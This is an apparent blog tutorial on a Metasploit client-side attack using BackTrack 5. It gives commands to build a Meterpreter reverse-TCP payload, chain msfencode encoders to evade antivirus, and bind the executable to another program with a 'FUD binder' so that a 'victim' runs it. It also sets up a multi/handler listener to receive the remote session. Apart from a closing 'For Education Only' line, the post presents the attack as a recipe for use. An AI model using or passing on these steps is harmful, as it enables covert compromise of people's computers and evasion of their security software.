Client side attack with Metaspolit

This is a tutorial on basic metaspolit client side attack using backtrack 5
in my case
i m gonna send a payload bound to an executable file, to the slave. if the slave opens the file the payload will be executed and it will give us a meterpreter session

 open terminal and type

cd /pentest/exploits/framework

 

 Next

Follow the image

Image

To get your wan IP address klik HERE

I use The windows/meterpreter/reverse_tcp because this PAYLOAD which will give us a tcp meterpreter session on execution..

Now we can see an executable file in your root folder named payload.exe … now we have to send this executable to victim ….

i m using a FUD binder to bind the payload with another executable file

i m using putty a ssh client  to spoof the victim and to evade anti virus

Next 

you can even use multiple encryption like this…

msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/msfpayload.exe

it will be detected by few AV’s , or you can try using different combinations …to see the list of available encryptions type “msfencode -h“..

or u can try hex editing after encryption

 

Next
Before sending the file to victim… we need to setup a listener to receive the meterpremeter session this step useful when the victim execute the file….

so… open the msfconsole ///// just type “msfconsole” without quote .. then type

use exploit/multi/handler

and for payload type this

set PAYLOAD windows/meterpreter/reverse_tcp

Next

type “ipconfig” in another terminal

 

Then, type

exploit

 

For Education Only….

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s